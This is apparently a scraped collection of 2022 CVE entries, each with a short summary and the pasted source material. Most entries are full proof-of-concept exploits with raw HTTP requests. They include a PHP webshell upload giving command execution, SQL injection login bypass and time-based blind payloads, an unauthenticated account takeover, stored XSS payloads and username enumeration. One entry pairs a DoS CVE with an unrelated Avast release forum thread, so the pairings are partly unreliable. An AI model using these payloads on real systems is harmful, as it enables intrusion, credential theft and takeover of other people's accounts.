Pharmacy Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file.

    # Exploit Title: Pharmacy management system - Remote Code Execution (RCE)# Date: 19/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Exploit  :  You can upload a php shell file as a productImage# ------------------------------------------------------------------------------------------#                                           POC# ------------------------------------------------------------------------------------------# Request sent as base userPOST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631Content-Length: 559Connection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneelUpgrade-Insecure-Requests: 1-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="old_image"-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="productImage"; filename="shell.php"Content-Type: image/jpeg<?phpif($_REQUEST['s']) {  system($_REQUEST['s']);  } else phpinfo();?></pre></body></html>-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="btn"-----------------------------208935235035266125502673738631--# ResponseHTTP/1.1 302 FoundDate: Tue, 19 Apr 2022 20:43:17 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cachelocation: ../product.phpContent-Length: 77Connection: closeContent-Type: text/html; charset=UTF-8Image uploaded successfully{"success":true,"messages":"Successfully Updated"}# ------------------------------------------------------------------------------------------#                                   Request to webshell# ------------------------------------------------------------------------------------------GET /dawapharma/dawapharma/assets/myimages/shell.php?s=echo+0xSaudi HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel# ------------------------------------------------------------------------------------------#                                    Webshell response# ------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Tue, 19 Apr 2022 20:55:58 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Content-Length: 33Connection: closeContent-Type: text/html; charset=UTF-8…0xSaudi</pre></body></html>

CVE-2022-30887: Pharmacy Management System 1.0 Shell Upload ≈ Packet Storm

Simple Student Quarterly Result/Grade System v1.0 was discovered to contain a SQL injection vulnerability via /sqgs/Actions.php.

    # Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
    # Date: 11/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Linux 
    
    
    
    
    # Vulnerable Code
    
    line 57 in file "/sqgs/Actions.php"
    
    @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
    
    
    Steps To Reproduce:
    * - Go to the login page http://localhost/sqgs/login.php
    
    Payload:
    
    username: admin ' or '1'='1'#--
    password: \
    
    
    
    Proof of Concept :
    
    POST /sqgs/Actions.php?a=login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 51
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/sqgs/login.php
    Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
    
    username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi

CVE-2022-26633: Offensive Security’s Exploit Database Archive

Multi Store Inventory Management System v1.0 allows attackers to perform an account takeover via a crafted POST request.

    # Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.bdtask.com/# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/# Version: 1.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3noz# Description :An attacker can takeover any registered 'Staff' user account by just sending below POST requestBy changing the the "id", "email", "password" , "firstname" and "lastname" parameters#Steps to Reproduce :1. Send the below POST request by changing "id", "email", "password" parameters.2. Log in to the user account by changed email and password.################################################POST /multistore_demo/dashboard/home/setting HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687Content-Length: 1645Origin: http://localhostConnection: closeReferer: http://localhost/multistore_demo/dashboard/home/settingCookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405Upgrade-Insecure-Requests: 1-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="id"1-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="firstname"saud-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="lastname"test-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="email"s3od@hi.com-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="password"admin123-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="about"-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="old_image"-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="image"; filename=""Content-Type: application/octet-stream-----------------------------246162487211952414471071914687--

CVE-2022-28993: Multi Store Inventory Management System 1.0 Account Takeover ≈ Packet Storm

The North Korea-backed Lazarus Group has been observed leveraging the Log4Shell vulnerability in VMware Horizon servers to deploy the NukeSped (aka Manuscrypt) implant against targets located in its southern counterpart.
"The attacker used the Log4j vulnerability on VMware Horizon products that were not applied with the security patch," AhnLab Security Emergency Response Center (ASEC) said in a

The North Korea-backed Lazarus Group has been observed leveraging the Log4Shell vulnerability in VMware Horizon servers to deploy the **NukeSped** (aka Manuscrypt) implant against targets located in its southern counterpart.

"The attacker used the Log4j vulnerability on VMware Horizon products that were not applied with the security patch," AhnLab Security Emergency Response Center (ASEC) said in a new report.

The intrusions are said to have been first discovered in April, although multiple threat actors, including those aligned with China and Iran, have employed the same approach to further their objectives over the past few months.

NukeSped is a backdoor that can perform various malicious activities based on commands received from a remote attacker-controlled domain. Last year, Kaspersky disclosed a spear-phishing campaign aimed at stealing critical data from defense companies using a NukeSped variant called ThreatNeedle.

Some of the key functions of the backdoor range from capturing keystrokes and taking screenshots to accessing the device's webcam and dropping additional payloads such as information stealers.

The stealer malware, a console-based utility, is designed to exfiltrate accounts and passwords saved in web browsers like Google Chrome, Mozilla Firefox, Internet Explorer, Opera, and Naver Whale as well as information about email accounts and recently opened Microsoft Office and Hancom files.

"The attacker collected additional information by using backdoor malware NukeSped to send command line commands," the researchers said. "The collected information can be used later in lateral movement attacks."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploiting VMware Horizon to Target South Korea with NukeSped Backdoor

ManageEngine ADSelfService Plus v6.1 allows attackers to perform username enumeration via a crafted POST request to /ServletAPI/accounts/login.

Permalink

**Zoho ManageEngine ADSelfService Plus 6121 Username Enumeration**

*   Version: 6.1 Build 6121
*   Tested against: ADSelfService 6118 - 6121

The domain username (sAMAccountName) enumeration can be conducted through the app. The domain users which are enrolled to the AdSelfService can be enumerated according to response of the application.

Sending following POST request vulnerability is exploited:

    PoC HTTP Request:
    
    POST /ServletAPI/accounts/login HTTP/1.1
    Host: target
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, /; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 23
    DNT: 1
    Connection: close
    Sec-GPC: 1
    
    loginName=USERNAME
    

The Administrator, krbtgt, Guest are default accounts in the Active Directory. The krbtgt and guest accounts are disabled defaultly.

*   If the user is not exist , the response is "eSTATUS":"Permission Denied. Kindly contact your Administrator."
*   If the user is exist , the response is ""LOGIN\_STATUS":"PASSWORD","WELCOME\_NAME":"{Username}"
*   If the user is disabled for example Guest or krbtgt user, the response is "eSTATUS":"Your account has been disabled. Please see your system administrator."
*   If the user is expired, the response is "eSTATUS":"Your account has expired. Please see your system administrator."

CVE-2022-28987: vulnerability-research/adselfservice-userenum.md at main · passtheticket/vulnerability-research

An arbitrary file write vulnerability in Avast Premium Security before v21.11.2500 (build 21.11.6809.528) allows attackers to cause a Denial of Service (DoS) via a crafted DLL file.

** Topic: NEW Avast Version 22.1 (January 2022)  (Read 9757 times)**

0 Members and 1 Guest are viewing this topic.

Hi, all. Please welcome the newest version of **Avast AV: 22.1** (22.1.2504)

_Notable improvements in the release:_

*   **Wi-Fi Inspector Password Hints** - Wi-Fi Inspector can now recommend more secure passwords for your home network
*   **Firewall improvements in the UI** - We've re-ordered the Firewall Tabs inside the interface
*   **Boot Time Scan Results** - You'll notice how from now on you get actual results from scans even after reboots

_Some bugfixes we worked on:_

*   Rootkit driver BSOD was fixed
*   User Interface password now works fine, doesn't get removed after update
*   And many more...

The first release of the year! Thank you to our team for the great effort!  
**How to install:**  
1\. Update from your existing Avast version via Settings -> Update -> Update program  
2\. Or you can download and install files:  
_Online installers (recommended):_

*   Free: https://bits.avcdn.net/insttype\_FREE
*   Premium Security: https://bits.avcdn.net/insttype\_APR

_Offline installers:_

*   Free: https://files.avast.com/iavs9x/avast\_free\_antivirus\_setup\_offline.exe
*   Premium Security: https://files.avast.com/iavs9x/avast\_premier\_antivirus\_setup\_offline.exe

(In case the hyperlink here wouldn't work in your browser, just paste and copy the URL to the browser address bar)

« _Last Edit: February 09, 2022, 06:48:17 AM by Karel Šťavík_ »

 Logged

Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.

 Logged

Thanks, spreading the news... 

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Thanks for the new release 

 Logged

**Main:** Win10 Pro 21H2 64bit / Core i5-7400 3.0GHz / 16GB RAM / Avast 22 Premium _**Beta(Icarus)**_ / Comodo Firewall (testing again)  
**Mobile:** Win10 Pro 21H1 64bit / Core i5-3340M 2.7GHz / 8GB RAM / Avast 21 Free / Windows Firewall Control

**Avast の設定について解説しています。**よろしければご覧ください。

Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?

 Logged

> Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  

Update

 Logged

> > Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  
> 
> Update  

Looks like the "version" should be Avast AV: 22.1 (22.1.6921).

\-dwh

 Logged

> Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.  

Avast shows enlightened self-interest and respect by taking note of the obervations of users.  Not to do so shows contempt for users.  To ignore users' views is tantamount to cutting off their own noses to spite their faces.  I wander off the Avast path from time to time.  The experience of that makes me respect Avast all the more.  The little popups are a price well worth paying.

 Logged

Windows 10 Pro x64, Avast Free 22.3.6008, Malwarebytes Anti-Exploit, Malwarebytes Anti-Ransomware

The free version doesn't have a firewall does it?

 Logged

 Logged

> The free version doesn't have a firewall does it?  

On Avast Free Antivirus (not Avast One Essentials), No it isn't, the two products are different.   
Don't I recall you trying Avast One and going back  ?

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

There's **Avast Free** and then there is  
**Avast One Essential**  
Both a free but different products.

 Logged

> The free version doesn't have a firewall does it?  

Hi, it does (since a few months).

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

> > The free version doesn't have a firewall does it?  
> 
> Hi, it does (since a few months).  

It isn't installed by default, but can be downloaded from the UI (I'm still on version 21.11.xxxx). 

Though I guess from a clean install it would be unless you didn't opt for a custom install.

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

It's an option that needs to be selected in a custom install  
as explained here: https://youtu.be/IxozZFC9XRk  
You can also select it later by using the option in  
troubleshooting to modify what you've installed.

 Logged

CVE-2022-28964: NEW Avast Version 22.1 (January 2022)

A stored cross-site scripting (XSS) vulnerability in the addNewPost component of OrangeHRM v4.10.1 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

**Environment details**  
OrangeHRM version: 4.10.1  
OrangeHRM source: Release build from Sourceforge or Git clone  
Platform: Ubuntu  
PHP version: 7.3.33  
Database and version: MariaDB 10.3  
Web server: Apache 2.4.52

If applicable:  
Browser: Firefox

**Describe the bug**  
Insufficient input validation in Buzz - addNewPost API results in Stored Cross Site Scripting attack. An attacker - who is an authenticated user - can craft a malicious request causing malicious Javascript to execute in the browser of any other user. The malicious Javascript can trigger when a victim user visits the Buzz page.

**To Reproduce**

1.  Authenticate to the user dashboard.
2.  Visit 'Buzz' page
3.  Collect the CSRF token from the HTML response. It can be found in an 'input' field with the id createPost__csrf_token. Example :

    <input type="hidden" name="createPost[_csrf_token]" value="8d7f3ee80979a1360fb445a6ffa1ffec" id="createPost__csrf_token">
    

4.  Collect the logged in user cookie _orangehrm
5.  Fire the following POST request including the CSRF token and cookie obtained. Replace the Host header too :

    POST /symfony/web/index.php/buzz/addNewPost HTTP/1.1
    Host: 1.2.3.44
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 173
    Origin: http://54.165.4.147
    Connection: close
    Cookie: Loggedin=True; _orangehrm=qod7ejr1fqjtvtnm27i62ltcrb
    
    createPost%5Bcontent%5D=content&createPost%5BlinkAddress%5D=javascript:alert(1221)&createPost%5BlinkTitle%5D=xss&createPost%5BlinkText%5D=&createPost%5B_csrf_token%5D=cb38d12166e154ded1869000c43c1ea5
    

6.  Click on the link 'xss' in the most recent post.

**Expected behavior**  
The value of parameters createPost[linkTitle] and createPost[linkAddress] should be validated by API and an error should be thrown.

**What do you see instead:**  
The malicious payload gets submitted successfully and get's stored in the posting made by the user.

**Screenshots**

  

**Technical Details**  
A logged in user can post status updates to their buzz feed. From the front-end application a user will be able to post a text within a single field which says "What's on your mind" to the buzz feed. This happens via a POST request to the URL /symfony/web/index.php/buzz/addNewPost through the createPost[content] request body parameter. While investigating this API, we found that there are extra parameter fields in the body of this API which is not directly exposed through the frontend application.

The following request body parameters found in the API results certain profound effects in the HTML response sent by server:

1.  createPost[linkAddress]
    
    Causes the addition of an <a> anchor tag in response with id linkTitle & with attribute src with the value set for createPost[linkAddress] parameter.
    
2.  createPost[linkTitle]
    
    Causes an <a> anchor tag in response with id linkTitle which is click able and displayed with the text content sent in the above request parameter.
    

Combining the above 2 parameters, it's possible to get an anchor HTML tag with a visible clickable text and a desired URL as src which is clickable.

The URL payload could be javascript as javascript:alert(121). This can result in execution of arbitrary malicious javascript code on the client side if the victim clicks on this link.  
The impact of this can be severe since this particular code gets stored in the database and gets delivered to the feed of every logged-in user in orangeHRM. Every user will have this delivered through their 'Buzz' feed.

In terms of impact, this vulnerability enables an attacker to stealing CSRF token and perform arbitrary actions on the website on behalf of the victim user.

CVE-2022-28985: Stored XSS in "Update Status" section under "OrangeBuzz" via the GET/POST parameters `createPost[linkTitle]` and `createPost[linkAddress]` · Issue #1217 · orangehrm/orangehrm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=delete_client.

    #### Title: Online Sports Complex Booking System 1.0 SQL Injection#### Author: Zllggggg#### Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html#### Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip####  Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20SQL%20Injection(%E4%BA%8C).md#### Tested on: Windows, MySQL, ApacheAfter entering the background, click the registered clients navigation, select a piece of data and click delete[image: 1648884355.jpg]Find the corresponding source code and find that the ID parameter passed bypost does not have any filtering[image: 1648884613.jpg]The vulnerability is also verified in sqlmap [image: 1648884408.jpg]Data packet```POST /scbs/classes/Users.php?f=delete_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 4Origin: http://localhostConnection: closeReferer: http://localhost/scbs/admin/?page=clientsCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=2```Payload```Parameter: id (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 4836 FROM (SELECT(SLEEP(5)))QbFZ) AND'aPSM'='aPSM---```

CVE-2022-28962: Online Sports Complex Booking System 1.0 SQL Injection ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=save_client.

    Title: Online Sports Complex Booking System 1.0 XSSAuthor: ZllgggggVendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.htmlSoftware: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zipReference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.mdTested on: Windows, MySQL, ApacheDescription:When registering users at the front desk, when we fill in the information,we use burpsuite to catch the data packet,After obtaining the data packet,modify the email parameter to <script>alert(1)</script> then send thepacket,Then log in to the background with the administrator account ,Clickregistered clients to trigger the pop-up windowData packetPOST /scbs/classes/Users.php?f=save_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------289647566033806702832762971625Content-Length: 1284Origin: http://localhostConnection: closeReferer: http://localhost/scbs/register.phpCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="id"1-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="firstname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="middlename"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="lastname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="gender"Male-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="contact"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="address"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="email"<script>alert(1)</script>-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="password"123-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="img"; filename=""Content-Type: application/octet-stream-----------------------------289647566033806702832762971625--

CVE-2022-29652: Online Sports Complex Booking System 1.0 Cross Site Scripting ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /classes/master.php?f=delete_ Facility.

**Title: Online Sports Complex Booking System 1.0 SQL Injection****Author: Zllggggg****Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html****Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs\_1.zip****Tested on: Windows, MySQL, Apache**

After the program is installed, enter the background, find the facility list in the right navigation bar, select a piece of data, and click the delete button 

According to the submission path /classes/master.php?f=delete\_ Facility, Find delete\_facility(),The ID parameter does not have any filtering,Therefore, SQL injection is caused 

Because the parameters are submitted in post mode,Use burpsuite to intercept and save it as a TXT file,Then use sqlmap to verify sqlmap -r 2.txt 

Data packet

    POST /scbs/classes/Master.php?f=delete_facility HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 4
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/scbs/admin/?page=facilities
    Cookie:PHPSESSID=t261ncguifvbucmfe31v6l74km
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    id=1
    

Payload

    Parameter: id (POST)
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 4984 FROM (SELECT(SLEEP(5)))KDjE) AND 'riWF'='riWF

Tag

#firefox